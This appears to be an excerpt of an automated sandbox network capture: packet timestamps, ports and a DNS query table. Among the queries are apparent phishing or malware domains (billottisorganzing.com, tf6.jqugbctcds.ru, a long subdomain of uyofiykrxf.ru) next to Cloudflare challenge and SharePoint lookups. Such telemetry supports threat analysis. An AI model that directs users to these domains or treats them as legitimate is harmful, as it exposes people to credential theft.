                                                                                                            Dec 22, 2024 00:46:56.751651049 CET44349783104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:56.751696110 CET49783443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:56.751982927 CET49783443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:56.751995087 CET44349783104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:56.771965981 CET49784443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:56.772003889 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:56.772082090 CET49784443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:56.772342920 CET49784443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:56.772356987 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:57.991041899 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:57.991339922 CET49784443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:57.991358042 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:57.991674900 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:57.992393970 CET49784443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:57.992451906 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:57.992568016 CET49784443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:58.035341024 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:58.038748026 CET49784443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:58.462068081 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:58.462135077 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:46:58.462240934 CET49784443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:58.467984915 CET49784443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:46:58.468004942 CET44349784104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:01.738574028 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:01.738703012 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:01.738821983 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:01.739268064 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:01.739366055 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:02.950447083 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:02.971952915 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:02.972018003 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:02.972377062 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:02.973691940 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:02.973771095 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:02.973882914 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:02.973947048 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:02.973989964 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:02.974090099 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:02.974142075 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.608233929 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.608299971 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.608408928 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.608431101 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.608483076 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:03.608483076 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:03.608549118 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.608953953 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.609009981 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:03.609371901 CET49785443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:03.609400988 CET44349785104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.616292000 CET49786443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:03.616328955 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.616405010 CET49786443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:03.616607904 CET49786443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:03.616621971 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.986934900 CET49787443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:03.987020969 CET44349787172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.987123966 CET49787443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:03.987406015 CET49787443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:03.987457991 CET44349787172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:04.828480959 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:04.828761101 CET49786443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:04.828775883 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:04.829097986 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:04.829379082 CET49786443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:04.829433918 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:04.829519033 CET49786443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:04.871335030 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:05.198831081 CET44349787172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:05.199111938 CET49787443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:05.199173927 CET44349787172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:05.200203896 CET44349787172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:05.200275898 CET49787443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:05.200566053 CET49787443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:05.200602055 CET49787443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:05.200630903 CET49787443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:05.200650930 CET44349787172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:05.200710058 CET49787443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:05.200978994 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:05.201066017 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:05.201149940 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:05.201328039 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:05.201369047 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:05.272130013 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:05.272219896 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:05.272265911 CET49786443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:05.273252964 CET49786443192.168.2.4104.18.95.41
                                                                                                            Dec 22, 2024 00:47:05.273277044 CET44349786104.18.95.41192.168.2.4
                                                                                                            Dec 22, 2024 00:47:06.418859959 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:06.419378042 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:06.419441938 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:06.420460939 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:06.420686007 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:06.421679020 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:06.421679974 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:06.421761990 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:06.421828032 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:06.476448059 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:06.476509094 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:06.523200989 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:07.342504978 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:07.342595100 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:07.343630075 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:07.344131947 CET49788443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:07.344194889 CET44349788172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:07.505851030 CET49789443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:07.505889893 CET44349789172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:07.505963087 CET49789443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:07.506231070 CET49789443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:07.506244898 CET44349789172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:08.716454983 CET44349789172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:08.717679977 CET49789443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:08.717715979 CET44349789172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:08.718688011 CET44349789172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:08.718766928 CET49789443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:08.719103098 CET49789443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:08.719131947 CET49789443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:08.719173908 CET44349789172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:08.719173908 CET49789443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:08.719237089 CET49789443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:08.719523907 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:08.719573021 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:08.719644070 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:08.719827890 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:08.719841003 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:09.932799101 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:09.933020115 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:09.933042049 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:09.934034109 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:09.934098005 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:09.934396029 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:09.934456110 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:09.934514046 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:09.934520960 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:09.979433060 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:10.799724102 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:10.799829006 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:10.799891949 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:10.800789118 CET49792443192.168.2.4172.67.181.220
                                                                                                            Dec 22, 2024 00:47:10.800806046 CET44349792172.67.181.220192.168.2.4
                                                                                                            Dec 22, 2024 00:47:35.539855957 CET49843443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:47:35.539942026 CET44349843142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:47:35.540250063 CET49843443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:47:35.540359974 CET49843443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:47:35.540390968 CET44349843142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:47:37.231551886 CET44349843142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:47:37.233366966 CET49843443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:47:37.233385086 CET44349843142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:47:37.233726025 CET44349843142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:47:37.250751972 CET49843443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:47:37.250880003 CET44349843142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:47:37.304522991 CET49843443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:47:46.970601082 CET44349843142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:47:46.970662117 CET44349843142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:47:46.970835924 CET49843443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:47:47.727871895 CET49843443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:47:47.727967978 CET44349843142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:48:35.602868080 CET49980443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:48:35.602977991 CET44349980142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:48:35.603077888 CET49980443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:48:35.603310108 CET49980443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:48:35.603367090 CET44349980142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:48:37.304466009 CET44349980142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:48:37.305069923 CET49980443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:48:37.305134058 CET44349980142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:48:37.305499077 CET44349980142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:48:37.305815935 CET49980443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:48:37.305891037 CET44349980142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:48:37.350984097 CET49980443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:48:47.000957966 CET44349980142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:48:47.001024961 CET44349980142.250.181.132192.168.2.4
                                                                                                            Dec 22, 2024 00:48:47.001079082 CET49980443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:48:47.086831093 CET49980443192.168.2.4142.250.181.132
                                                                                                            Dec 22, 2024 00:48:47.086857080 CET44349980142.250.181.132192.168.2.4
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 22, 2024 00:46:31.406368017 CET53512771.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:31.451860905 CET5084153192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:31.452119112 CET6069053192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:31.538347006 CET53627561.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:31.859631062 CET53508411.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:31.859739065 CET53606901.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:33.576164961 CET5375953192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:33.576411963 CET6397253192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:33.578671932 CET5017753192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:33.578813076 CET5209853192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:33.713422060 CET53639721.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:33.713474989 CET53537591.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:33.715723991 CET53501771.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:33.718116999 CET53520981.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:34.217739105 CET53549531.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:35.477402925 CET5068453192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:35.477556944 CET6220853192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:35.614274025 CET53506841.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:35.614892006 CET53622081.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:35.787883997 CET5087653192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:35.788024902 CET5801553192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:35.899708986 CET5991953192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:35.899991035 CET5639053192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:35.925065994 CET53580151.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:35.925504923 CET53508761.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:36.265450001 CET53599191.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:36.265722036 CET53563901.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:39.718740940 CET5027553192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:39.718926907 CET5943153192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:39.719412088 CET6165253192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:39.719553947 CET5543753192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:39.719949007 CET5076653192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:39.720113993 CET5292353192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:39.860095024 CET53502751.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:39.860173941 CET53594311.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:39.860692024 CET53616521.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:39.860706091 CET53507661.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:39.860718966 CET53529231.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:39.860733032 CET53554371.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:42.079807043 CET5357953192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:42.079950094 CET6135953192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:42.216793060 CET53613591.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:42.217550993 CET53535791.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:43.688657045 CET6373853192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:43.688807011 CET5938653192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:43.705866098 CET6326553192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:43.706031084 CET4931153192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:43.825810909 CET53593861.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:43.826397896 CET53637381.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:43.843452930 CET53493111.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:43.843472958 CET53632651.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:43.880687952 CET53535401.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:44.669651031 CET138138192.168.2.4192.168.2.255
                                                                                                            Dec 22, 2024 00:46:48.546521902 CET5063453192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:48.546725988 CET5436653192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:46:48.683626890 CET53506341.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:48.683751106 CET53543661.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:46:51.191373110 CET53530171.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.615272999 CET5843953192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:03.615473986 CET6314353192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:03.985831022 CET53584391.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:47:03.986351967 CET53631431.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:47:07.354446888 CET6531253192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:07.354588032 CET5969953192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:07.365228891 CET6057353192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:07.365453005 CET5036553192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:07.504060030 CET53503651.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:47:07.505275011 CET53605731.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:47:07.843986034 CET53596991.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:47:09.988966942 CET53555671.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:47:14.875600100 CET5585153192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:14.875648022 CET6200753192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:14.877001047 CET5688453192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:14.877115011 CET5624253192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:17.825064898 CET5153053192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:17.825193882 CET6339353192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:18.877615929 CET5634853192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:18.877753019 CET6028853192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:21.259191990 CET6018153192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:21.259335041 CET6244253192.168.2.41.1.1.1
                                                                                                            Dec 22, 2024 00:47:31.070566893 CET53508021.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:47:32.477164030 CET53508221.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:48:02.661916971 CET53549681.1.1.1192.168.2.4
                                                                                                            Dec 22, 2024 00:48:47.225816965 CET53591001.1.1.1192.168.2.4
                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                            Dec 22, 2024 00:47:10.120839119 CET192.168.2.41.1.1.1c2bb(Port unreachable)Destination Unreachable
                                                                                                            Dec 22, 2024 00:47:15.099227905 CET192.168.2.41.1.1.1c25f(Port unreachable)Destination Unreachable
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 22, 2024 00:46:31.451860905 CET192.168.2.41.1.1.10xaecStandard query (0)billottisorganzing.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:31.452119112 CET192.168.2.41.1.1.10x49deStandard query (0)billottisorganzing.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:33.576164961 CET192.168.2.41.1.1.10x30c0Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:33.576411963 CET192.168.2.41.1.1.10xb7d2Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:33.578671932 CET192.168.2.41.1.1.10xa4c8Standard query (0)billottisorganzing.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:33.578813076 CET192.168.2.41.1.1.10x108eStandard query (0)billottisorganzing.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.477402925 CET192.168.2.41.1.1.10x8885Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.477556944 CET192.168.2.41.1.1.10x7dc2Standard query (0)www.google.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.787883997 CET192.168.2.41.1.1.10x696dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.788024902 CET192.168.2.41.1.1.10x357fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.899708986 CET192.168.2.41.1.1.10x8b0aStandard query (0)tf6.jqugbctcds.ruA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:35.899991035 CET192.168.2.41.1.1.10xc7cfStandard query (0)tf6.jqugbctcds.ru65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.718740940 CET192.168.2.41.1.1.10x369Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.718926907 CET192.168.2.41.1.1.10xfd46Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.719412088 CET192.168.2.41.1.1.10x3aabStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.719553947 CET192.168.2.41.1.1.10x9e7eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.719949007 CET192.168.2.41.1.1.10x79dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:39.720113993 CET192.168.2.41.1.1.10xa120Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:42.079807043 CET192.168.2.41.1.1.10x3bb2Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:42.079950094 CET192.168.2.41.1.1.10x9aa6Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.688657045 CET192.168.2.41.1.1.10x9c78Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.688807011 CET192.168.2.41.1.1.10x2778Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.705866098 CET192.168.2.41.1.1.10x9799Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:43.706031084 CET192.168.2.41.1.1.10xa740Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:48.546521902 CET192.168.2.41.1.1.10xbe54Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:46:48.546725988 CET192.168.2.41.1.1.10x2060Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:03.615272999 CET192.168.2.41.1.1.10xb5f8Standard query (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ruA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:03.615473986 CET192.168.2.41.1.1.10x7667Standard query (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:07.354446888 CET192.168.2.41.1.1.10xe2e8Standard query (0)www.sharepoint.comA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:07.354588032 CET192.168.2.41.1.1.10xcad6Standard query (0)www.sharepoint.com65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:07.365228891 CET192.168.2.41.1.1.10x9541Standard query (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ruA (IP address)IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:07.365453005 CET192.168.2.41.1.1.10x1b64Standard query (0)2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru65IN (0x0001)false
                                                                                                            Dec 22, 2024 00:47:14.875600100 CET192.168.2.41.1.1.10x62bdStandard query (0)assets.onestore.msA (IP address)IN (0x0001)false
